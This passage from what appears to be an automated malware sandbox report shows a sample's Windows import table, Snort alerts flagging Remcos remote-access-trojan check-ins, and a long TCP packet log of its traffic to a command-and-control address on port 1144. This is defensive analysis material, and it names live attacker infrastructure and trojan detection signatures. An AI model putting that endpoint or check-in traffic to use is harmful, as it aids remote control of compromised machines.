                                                                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                  gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                                  user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                  kernel32.dllSleep
                                                                                                                                                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                  comdlg32.dllGetSaveFileNameA, GetOpenFileNameA

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  04/24/24-07:20:40.804567TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497111144192.168.2.8103.186.117.142
                                                                                                                                                  04/24/24-07:23:03.835490TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response114449711103.186.117.142192.168.2.8

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 24, 2024 07:20:30.196149111 CEST49705443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.196193933 CEST4434970513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.196283102 CEST49705443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.201636076 CEST49705443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.201677084 CEST4434970513.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.201735020 CEST49705443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.238039970 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.238161087 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.238246918 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.241255999 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.241286993 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.781940937 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.782135963 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.787621021 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.787628889 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.788009882 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:30.833478928 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.841881037 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:30.884110928 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:32.000521898 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:32.000597000 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:32.000684023 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:32.002690077 CEST49706443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:32.002706051 CEST4434970613.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.333086967 CEST49708443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.333137035 CEST4434970813.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.333205938 CEST49708443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.333434105 CEST49708443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.333478928 CEST4434970813.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.333754063 CEST49708443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.412733078 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.412821054 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.413134098 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.414189100 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.414222956 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.932493925 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.932601929 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.934453011 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.934474945 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.934710026 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:36.977547884 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:36.988152027 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:37.036120892 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:37.885379076 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:37.885600090 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:37.885699034 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:37.920790911 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:37.920790911 CEST49709443192.168.2.813.107.139.11
                                                                                                                                                  Apr 24, 2024 07:20:37.920845985 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:37.920881033 CEST4434970913.107.139.11192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:40.414899111 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:40.803522110 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:40.803760052 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:40.804567099 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:41.273894072 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:41.312289000 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:41.314066887 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:41.752518892 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:41.755002022 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:41.801486969 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:41.890260935 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:41.945225000 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:42.165534973 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.165755033 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.165823936 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.250741005 CEST8049714178.237.33.50192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.250909090 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:42.251774073 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:42.264514923 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.264627934 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.265050888 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.562464952 CEST8049714178.237.33.50192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.562532902 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:42.581983089 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.582077026 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.582097054 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.582117081 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.582226038 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.582261086 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.603140116 CEST497111144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.653491974 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.653512955 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.653597116 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.653652906 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.976016998 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976085901 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976145029 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976186037 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.976188898 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976227045 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976229906 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.976264954 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976301908 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976309061 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:42.976341009 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:42.976385117 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.061500072 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.061532021 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.061611891 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.061661959 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.061875105 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.061878920 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.061918020 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.061938047 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.061980963 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.062017918 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.062032938 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.062143087 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.062196016 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.062230110 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.062278032 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.070317984 CEST114449711103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337644100 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337667942 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337738037 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337738991 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.337790966 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337821007 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.337862015 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337963104 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.337994099 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338449001 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338466883 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338484049 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338498116 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338500023 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338516951 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338534117 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338536024 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338553905 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338567972 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338576078 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338593960 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338608027 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.338651896 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.338679075 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459539890 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459706068 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459722996 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459737062 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459753036 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.459830046 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459908962 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.459964991 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460144043 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460159063 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460194111 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460336924 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460387945 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460529089 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460602045 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460616112 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460656881 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.460922003 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.460973978 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.461007118 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.461287975 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.559995890 CEST8049714178.237.33.50192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.560159922 CEST4971480192.168.2.8178.237.33.50
                                                                                                                                                  Apr 24, 2024 07:20:43.714111090 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714202881 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714221954 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714241028 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714260101 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714268923 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714289904 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714294910 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714349031 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714356899 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714422941 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714469910 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714812040 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714833021 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714874029 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.714943886 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.714987993 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715028048 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715080976 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715147972 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715176105 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715184927 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715219975 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715251923 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715308905 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715368986 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715406895 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715572119 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715598106 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715634108 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715652943 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715708971 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715744972 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715781927 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715841055 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.715873957 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.715989113 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716078997 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716109037 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716135979 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716316938 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716350079 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716401100 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716466904 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716500998 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.716545105 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716629028 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.716660023 CEST497121144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:43.830142975 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830172062 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830187082 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830202103 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830216885 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830327988 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830403090 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830579042 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830737114 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.830919027 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831114054 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831382990 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831655025 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.831957102 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832124949 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832370043 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.832454920 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.846796036 CEST114449713103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:43.846868992 CEST497131144192.168.2.8103.186.117.142
                                                                                                                                                  Apr 24, 2024 07:20:44.100356102 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.100384951 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.100402117 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.100452900 CEST114449712103.186.117.142192.168.2.8
                                                                                                                                                  Apr 24, 2024 07:20:44.100486040 CEST497121144192.168.2.8103.186.117.142
